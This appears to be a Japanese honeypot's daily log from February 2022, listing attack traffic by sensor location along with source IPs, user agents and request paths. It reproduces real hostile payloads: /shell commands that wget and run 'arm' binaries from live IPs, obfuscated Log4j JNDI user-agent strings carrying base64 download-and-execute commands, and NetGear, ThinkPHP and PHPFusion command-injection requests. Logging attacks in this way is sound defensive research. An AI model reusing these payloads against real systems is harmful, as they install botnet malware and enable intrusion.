ハニーポット(仮) 観測記録 2022/02/19分です。
特徴
共通
D-link製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
/.envへのスキャン行為
Location:JP
Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
PHPFusionの脆弱性(CVE-2020-24949)を狙うアクセス
zgrabによるスキャン行為
/.gitへのスキャン行為
5.188.210.227に関する不正通信
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget http://198.46.209.106/.s4y/arm; sh /tmp/arm
Location:US
Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
/.gitへのスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 143.47.243.177/arm7; sh /tmp/arm7
cd /tmp; rm -rf *; wget http://198.46.209.106/.s4y/arm; sh /tmp/arm
cd /tmp; rm -rf *; wget http://205.185.124.91/.s4y/arm; sh /tmp/arm
cd /tmp; rm -rf *; wget http://23.94.7.175/.s4y/arm; sh /tmp/arm
Location:UK
Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
.jsへのスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
Laravelへのスキャン行為
WordPress Pluginへのスキャン行為
phpMyAdminへのスキャン行為
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget http://23.94.7.175/.s4y/arm; sh /tmp/arm
Location:SG
Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Lkx-TraversalHttpPluginによるスキャン行為
curlによるスキャン行為
l9exploreによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
UserAgentがHello, Worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget http://198.46.209.106/.s4y/arm; sh /tmp/arm
cd /tmp; rm -rf *; wget http://23.94.7.175/.s4y/arm; sh /tmp/arm
他
アクセス数推移
JP:総アクセス数:59 (前日比:-161)
US:総アクセス数:48 (前日比:-374)
UK:総アクセス数:184 (前日比:150)
SG:総アクセス数:58 (前日比:0)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 5.188.210.227 | Russia |
| 1 | 18.209.60.16 | United States |
| 1 | 20.120.36.45 | United States |
| 1 | 27.35.2.22 | South Korea |
| 1 | 34.86.35.28 | United States |
| 2 | 40.76.207.72 | United States |
| 1 | 43.225.159.173 | Hong Kong |
| 3 | 44.202.203.122 | United States |
| 1 | 51.81.159.11 | United States |
| 2 | 61.219.11.151 | Taiwan |
| 1 | 81.17.23.106 | Panama |
| 2 | 93.22.135.179 | France |
| 1 | 107.189.6.200 | United States |
| 1 | 120.85.115.240 | China |
| 1 | 122.180.20.26 | India |
| 1 | 122.235.84.150 | China |
| 13 | 135.125.217.54 | France |
| 3 | 135.125.244.48 | France |
| 2 | 139.162.72.103 | Netherlands |
| 1 | 147.182.194.34 | United States |
| 1 | 157.245.58.109 | United States |
| 2 | 157.245.70.127 | United States |
| 2 | 167.71.244.124 | United States |
| 1 | 175.107.4.212 | Pakistan |
| 1 | 179.43.173.14 | Panama |
| 1 | 183.136.225.42 | China |
| 1 | 185.100.87.136 | Seychelles |
| 6 | 185.254.196.217 | Ukraine |
| 2 | 185.254.196.218 | Ukraine |
| 1 | 192.241.210.233 | United States |
| 1 | 193.56.146.51 | Russia |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 14 | - |
| 1 | Mozila/5.0 |
| 1 | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) |
| 2 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0 |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0 |
| 32 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 1 | Mozilla/5.0 zgrab/0.x |
| 1 | lynx |
| 1 | python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.45.1.el7.x86_64 |
| 1 | t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//167[.]172[.]246[.]16:1389/Basic/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaHR0cDovL3ZhbGxleXNjYW5uZXIuZHVja2Rucy5vcmcvc3NoZC5zaDsgY3VybCAtTyBodHRwOi8vdmFsbGV5c2Nhbm5lci5kdWNrZG5zLm9yZy9zc2hkLnNoOyBjaG1vZCA3Nzcgc3NoZC5zaDsgc2ggc3NoZC5zaA==}') |
| 1 | t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//167[.]172[.]246[.]16:1389/GroovyBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaHR0cDovL3ZhbGxleXNjYW5uZXIuZHVja2Rucy5vcmcvc3NoZC5zaDsgY3VybCAtTyBodHRwOi8vdmFsbGV5c2Nhbm5lci5kdWNrZG5zLm9yZy9zc2hkLnNoOyBjaG1vZCA3Nzcgc3NoZC5zaDsgc2ggc3NoZC5zaA==}') |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | \x03 |
||
| 1 | \x16\x03\x01\x01\xfa\x01 |
||
| 2 | \x16\x03\x01\x02 |
||
| 2 | \x16\x03\x01 |
||
| 32 | GET | /.env |
HTTP/1.1 |
| 1 | GET | /.git/config |
HTTP/1.1 |
| 2 | GET | /:undefined |
HTTP/1.1 |
| 1 | GET | /ReportServer |
HTTP/1.1 |
| 1 | GET | /_profiler/phpinfo |
HTTP/1.1 |
| 1 | GET | /ab2g |
HTTP/1.1 |
| 1 | GET | /ab2h |
HTTP/1.1 |
| 1 | GET | /boaform/admin/formLogin?username=admin&psd=admin |
HTTP/1.0 |
| 1 | GET | /boaform/admin/formLogin?username=user&psd=user |
HTTP/1.0 |
| 1 | GET | /infusions/downloads/downloads.php?cat_id=$%7Bsystem(ls)%7D |
HTTP/1.1 |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ http[:]//198[.]46[.]209[.]106/.s4y/arm;sh+/tmp/arm |
|
| 1 | GET | /users/sign_in |
HTTP/1.1 |
| 1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 1 | GET | /wp-content/ |
HTTP/1.1 |
| 1 | GET | http[:]//5[.]188[.]210[.]227/echo.php |
HTTP/1.1 |
| 1 | POST | /10 |
HTTP/1.1 |
| 2 | POST | /HNAP1/ |
HTTP/1.0 |
| 1 | POST | /HNAP1/ |
HTTP/1.1 |
| 1 | POST | /result%3Fhl%3Den%26meta%3Dvvnwppnloxhwtqccppbyhqmrwyswqen |
HTTP/1.1 |
| 1 | POST | https[:]//www[.]google[.]com |
HTTP/1.0 |
Location:US
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 15.204.25.136 | United States |
| 1 | 18.209.60.16 | United States |
| 1 | 45.9.20.65 | Russia |
| 6 | 45.146.165.37 | Russia |
| 9 | 51.79.29.48 | Canada |
| 1 | 54.224.113.64 | United States |
| 1 | 61.219.11.151 | Taiwan |
| 1 | 89.248.165.24 | United Kingdom |
| 2 | 94.232.43.63 | Russia |
| 5 | 104.42.99.236 | United States |
| 1 | 107.189.6.200 | United States |
| 1 | 120.86.254.211 | China |
| 1 | 139.162.238.243 | Netherlands |
| 2 | 157.245.70.127 | United States |
| 2 | 159.65.244.223 | United States |
| 1 | 162.213.255.8 | United States |
| 1 | 167.94.146.60 | United States |
| 1 | 172.105.89.161 | United States |
| 1 | 179.43.173.14 | Panama |
| 1 | 182.149.83.94 | China |
| 1 | 189.189.177.11 | Mexico |
| 1 | 193.56.146.51 | Russia |
| 1 | 194.12.87.168 | Ukraine |
| 4 | 194.195.252.60 | United States |
| 1 | 196.191.68.121 | Ethiopia |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 13 | - |
| 1 | Mozila/5.0 |
| 1 | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
| 6 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 |
| 18 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36 |
| 4 | python-requests/2.18.4 |
| 2 | t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//167[.]172[.]246[.]16:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaHR0cDovL3ZhbGxleXNjYW5uZXIuZHVja2Rucy5vcmcvc3NoZC5zaDsgY3VybCAtTyBodHRwOi8vdmFsbGV5c2Nhbm5lci5kdWNrZG5zLm9yZy9zc2hkLnNoOyBjaG1vZCA3Nzcgc3NoZC5zaDsgc2ggc3NoZC5zaA==}') |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 4 | \x03 |
||
| 14 | GET | /.env |
HTTP/1.1 |
| 4 | GET | /.git/config |
HTTP/1.1 |
| 1 | GET | /0bef |
HTTP/1.0 |
| 2 | GET | /:80:undefined |
HTTP/1.1 |
| 1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
| 1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
| 1 | GET | /_profiler/empty/search/results?limit=10 |
HTTP/1.1 |
| 1 | GET | /ab2g |
HTTP/1.1 |
| 1 | GET | /ab2h |
HTTP/1.1 |
| 1 | GET | /admin/ |
HTTP/1.1 |
| 1 | GET | /app/.env |
HTTP/1.1 |
| 1 | GET | /console/ |
HTTP/1.1 |
| 1 | GET | /core/.env |
HTTP/1.1 |
| 1 | GET | /favicon.ico |
HTTP/1.1 |
| 1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
| 1 | GET | /opt/env/.env |
HTTP/1.1 |
| 1 | GET | /public/.env |
HTTP/1.1 |
| 1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 |
HTTP/1.0 |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ 143.47.243.177/arm7;sh+/tmp/arm7 |
|
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ http[:]//198[.]46[.]209[.]106/.s4y/arm;sh+/tmp/arm |
|
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ http[:]//205[.]185[.]124[.]91/.s4y/arm;sh+/tmp/arm |
|
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ http[:]//23[.]94[.]7[.]175/.s4y/arm;sh+/tmp/arm |
|
| 1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
| 1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 1 | POST | /HNAP1/ |
HTTP/1.1 |
| 1 | POST | /result%3Fhl%3Den%26meta%3Dvvnwppnloxhwtqccppbyhqmrwyswqen |
HTTP/1.1 |
| 1 | PRI | * |
HTTP/2.0 |
Location:UK
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 34.86.35.17 | United States |
| 1 | 45.9.20.65 | Russia |
| 1 | 45.33.102.90 | United States |
| 4 | 45.137.21.134 | Bangladesh |
| 15 | 45.146.165.37 | Russia |
| 132 | 51.210.181.159 | France |
| 1 | 61.219.11.151 | Taiwan |
| 1 | 64.227.180.161 | United States |
| 1 | 66.249.64.63 | United States |
| 1 | 89.248.165.24 | United Kingdom |
| 5 | 104.42.99.236 | United States |
| 1 | 107.189.6.200 | United States |
| 1 | 110.240.91.120 | China |
| 2 | 157.245.70.127 | United States |
| 1 | 162.142.125.213 | United States |
| 7 | 164.90.201.214 | United States |
| 1 | 167.248.133.63 | United States |
| 1 | 172.104.138.223 | United States |
| 1 | 179.189.124.26 | Brazil |
| 1 | 182.123.211.176 | China |
| 1 | 185.245.62.225 | Germany |
| 1 | 193.56.146.51 | Russia |
| 1 | 200.114.64.133 | Chile |
| 1 | 205.185.116.212 | United States |
| 1 | 209.17.96.226 | United States |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 14 | - |
| 1 | Mozila/5.0 |
| 1 | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
| 5 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 |
| 15 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 |
| 132 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 |
| 5 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
| 1 | Mozilla/5.0 (compatible; Googlebot/2.1; +http[:]//www[.]google[.]com/bot.html) |
| 4 | Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2 |
| 1 | Mozilla/5.0 Gecko/20100101 |
| 1 | VLC/3.0.8 LibVLC/3.0.8 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 2 | \x03 |
||
| 1 | \x16\x03\x01\x01\xfc\x01 |
||
| 2 | \x16\x03\x01 |
||
| 1 | GET | /.env |
HTTP/1.1 |
| 1 | GET | /2phpmyadmin/index.php?lang=en |
HTTP/1.1 |
| 2 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
| 2 | GET | /MyAdmin/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /PMA/index.php?lang=en |
HTTP/1.1 |
| 2 | GET | /PMA2011/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /PMA2012/index.php?lang=en |
HTTP/1.1 |
| 3 | GET | /PMA2013/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /PMA2018/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
| 2 | GET | /_phpMyAdmin/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /_phpmyadmin/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /_profiler/empty/search/results?limit=10 |
HTTP/1.1 |
| 1 | GET | /ab2g |
HTTP/1.1 |
| 1 | GET | /ab2h |
HTTP/1.1 |
| 1 | GET | /admin/ |
HTTP/1.1 |
| 2 | GET | /admin/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /admin/phpMyAdmin/index.php?lang=en |
HTTP/1.1 |
| 2 | GET | /admin/sqladmin/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /admin/web/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /administrator/db/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /administrator/phpMyAdmin/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /administrator/phpmyadmin/index.php?lang=en |
HTTP/1.1 |
| 2 | GET | /administrator/pma/index.php?lang=en |
HTTP/1.1 |
| 3 | GET | /administrator/web/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /app/.env |
HTTP/1.1 |
| 1 | GET | /boaform/admin/formLogin?username=admin&psd=admin |
HTTP/1.0 |
| 1 | GET | /c/version.js |
HTTP/1.1 |
| 1 | GET | /config/getuser?index=0 |
HTTP/1.1 |
| 2 | GET | /console/ |
HTTP/1.1 |
| 1 | GET | /core/.env |
HTTP/1.1 |
| 2 | GET | /database/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /db/db-admin/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /db/dbweb/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /db/index.php?lang=en |
HTTP/1.1 |
| 2 | GET | /db/phpMyAdmin-3/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /db/phpMyAdmin/index.php?lang=en |
HTTP/1.1 |
| 2 | GET | /db/phpMyAdmin3/index.php?lang=en |
HTTP/1.1 |
| 2 | GET | /db/phpmyadmin/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /db/phpmyadmin3/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /db/webadmin/index.php?lang=en |
HTTP/1.1 |
| 3 | GET | /db/webdb/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /db/websql/index.php?lang=en |
HTTP/1.1 |
| 2 | GET | /dbadmin/index.php?lang=en |
HTTP/1.1 |
| 4 | GET | /dispatch.asp |
HTTP/1.1 |
| 1 | GET | /flu/403.html |
HTTP/1.1 |
| 1 | GET | /fuN3 |
HTTP/1.0 |
| 2 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
| 1 | GET | /manager/html |
HTTP/1.1 |
| 1 | GET | /mysql/admin/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /mysql/db/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /mysql/mysqlmanager/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /mysql/pma/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /mysql/sqlmanager/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /mysqladmin/index.php?lang=en |
HTTP/1.1 |
| 2 | GET | /mysqlmanager/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /opt/env/.env |
HTTP/1.1 |
| 4 | GET | /php-my-admin/index.php?lang=en |
HTTP/1.1 |
| 2 | GET | /php-myadmin/index.php?lang=en |
HTTP/1.1 |
| 2 | GET | /phpMyAdmin-3/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /phpMyAdmin-4.9.7-english/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /phpMyAdmin-4.9.7/index.php?lang=en |
HTTP/1.1 |
| 2 | GET | /phpMyAdmin-4/index.php?lang=en |
HTTP/1.1 |
| 3 | GET | /phpMyAdmin-5.1.0-english/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /phpMyAdmin-5.1.0/index.php?lang=en |
HTTP/1.1 |
| 3 | GET | /phpMyAdmin2/index.php?lang=en |
HTTP/1.1 |
| 2 | GET | /phpMyAdmin3/index.php?lang=en |
HTTP/1.1 |
| 2 | GET | /phpMyAdmin5/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /phpMyAdmin_/index.php?lang=en |
HTTP/1.1 |
| 2 | GET | /phpmy/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /phpmyadmin/index.php?lang=en |
HTTP/1.1 |
| 2 | GET | /phpmyadmin1/index.php?lang=en |
HTTP/1.1 |
| 2 | GET | /phpmyadmin2011/index.php?lang=en |
HTTP/1.1 |
| 2 | GET | /phpmyadmin2012/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /phpmyadmin2014/index.php?lang=en |
HTTP/1.1 |
| 2 | GET | /phpmyadmin2016/index.php?lang=en |
HTTP/1.1 |
| 2 | GET | /phpmyadmin2017/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /phpmyadmin2018/index.php?lang=en |
HTTP/1.1 |
| 3 | GET | /phpmyadmin2021/index.php?lang=en |
HTTP/1.1 |
| 2 | GET | /phpmyadmin3/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /phpmyadmin4/index.php?lang=en |
HTTP/1.1 |
| 2 | GET | /phpmyadmin_/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /pma/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /pma2012/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /pma2014/index.php?lang=en |
HTTP/1.1 |
| 2 | GET | /pma2016/index.php?lang=en |
HTTP/1.1 |
| 2 | GET | /pma2017/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /pma2018/index.php?lang=en |
HTTP/1.1 |
| 2 | GET | /pma2019/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /pma2020/index.php?lang=en |
HTTP/1.1 |
| 2 | GET | /pma2021/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /public/.env |
HTTP/1.1 |
| 1 | GET | /robots.txt |
HTTP/1.1 |
| 2 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ http[:]//23[.]94[.]7[.]175/.s4y/arm;sh+/tmp/arm |
|
| 2 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
| 3 | GET | /sql/myadmin/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /sql/phpMyAdmin/index.php?lang=en |
HTTP/1.1 |
| 3 | GET | /sql/phpMyAdmin2/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /sql/phpmyadmin5/index.php?lang=en |
HTTP/1.1 |
| 2 | GET | /sql/sql-admin/index.php?lang=en |
HTTP/1.1 |
| 2 | GET | /sql/webadmin/index.php?lang=en |
HTTP/1.1 |
| 2 | GET | /sql/webdb/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /sql/websql/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | /stalker_portal/c/version.js |
HTTP/1.1 |
| 1 | GET | /stream/live.php |
HTTP/1.1 |
| 1 | GET | /streaming/clients_live.php |
HTTP/1.1 |
| 1 | GET | /system_api.php |
HTTP/1.1 |
| 2 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 1 | GET | /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en |
HTTP/1.1 |
| 1 | GET | http[:]//fivem[.]k2roleplay[.]com:30120/client |
HTTP/1.0 |
| 1 | HEAD | / |
HTTP/1.0 |
| 2 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
| 1 | POST | /HNAP1/ |
HTTP/1.1 |
| 1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
| 1 | POST | /result%3Fhl%3Den%26meta%3Dvvnwppnloxhwtqccppbyhqmrwyswqen |
HTTP/1.1 |
| 1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 2 | PRI | * |
HTTP/2.0 |
Location:SG
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 20.112.5.104 | United States |
| 1 | 20.115.44.34 | United States |
| 1 | 20.127.108.142 | United States |
| 4 | 39.107.140.252 | China |
| 8 | 45.146.165.37 | Russia |
| 5 | 51.79.29.48 | Canada |
| 1 | 54.224.113.64 | United States |
| 1 | 61.219.11.151 | Taiwan |
| 1 | 89.248.165.24 | United Kingdom |
| 2 | 94.232.43.63 | Russia |
| 1 | 107.189.6.200 | United States |
| 1 | 124.164.251.197 | China |
| 1 | 128.199.191.207 | United Kingdom |
| 1 | 138.91.105.118 | United States |
| 8 | 161.35.86.181 | United States |
| 1 | 162.142.125.213 | United States |
| 1 | 165.22.42.39 | United States |
| 1 | 167.71.244.124 | United States |
| 1 | 172.105.77.209 | United States |
| 1 | 172.105.89.161 | United States |
| 1 | 180.115.41.142 | China |
| 1 | 185.220.100.254 | Germany |
| 1 | 191.96.206.70 | Chile |
| 2 | 191.96.206.74 | Chile |
| 1 | 191.96.206.75 | Chile |
| 1 | 192.241.209.104 | United States |
| 1 | 193.56.146.51 | Russia |
| 1 | 198.46.233.60 | United States |
| 1 | 203.115.85.160 | India |
| 1 | 209.17.96.2 | United States |
| 1 | 209.105.243.70 | United States |
| 1 | 209.141.35.128 | United States |
| 1 | 209.201.15.190 | United States |
| 1 | 218.161.66.117 | Taiwan |
| 1 | 223.166.225.113 | China |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 15 | - |
| 3 | Go-http-client/1.1 |
| 1 | Hello, World |
| 1 | Lkx-TraversalHttpPlugin/0.0.1 (+https[:]//leakix[.]net/, +https[:]//twitter[.]com/HaboubiAnis) |
| 1 | Mozila/5.0 |
| 4 | Mozilla/5.0 (Linux x86_64) Firefox/78.0 |
| 1 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 |
| 8 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 |
| 13 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
| 1 | Mozilla/5.0 zgrab/0.x |
| 1 | curl/7.29.0 |
| 3 | l9explore/1.3.0 |
| 1 | lynx |
| 1 | t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//167[.]172[.]246[.]16:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaHR0cDovL3ZhbGxleXNjYW5uZXIuZHVja2Rucy5vcmcvc3NoZC5zaDsgY3VybCAtTyBodHRwOi8vdmFsbGV5c2Nhbm5lci5kdWNrZG5zLm9yZy9zc2hkLnNoOyBjaG1vZCA3Nzcgc3NoZC5zaDsgc2ggc3NoZC5zaA==}') |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | - |
||
| 4 | \x03 |
||
| 1 | \x16\x03\x01\x01\xfb\x01 |
||
| 1 | \x16\x03\x01\x02 |
||
| 2 | \x16\x03\x01 |
||
| 1 | CONNECT | leakix[.]net:443 |
HTTP/1.1 |
| 1 | GET | /.DS_Store |
HTTP/1.1 |
| 15 | GET | /.env |
HTTP/1.1 |
| 1 | GET | /0bef |
HTTP/1.0 |
| 1 | GET | /:80:undefined |
HTTP/1.1 |
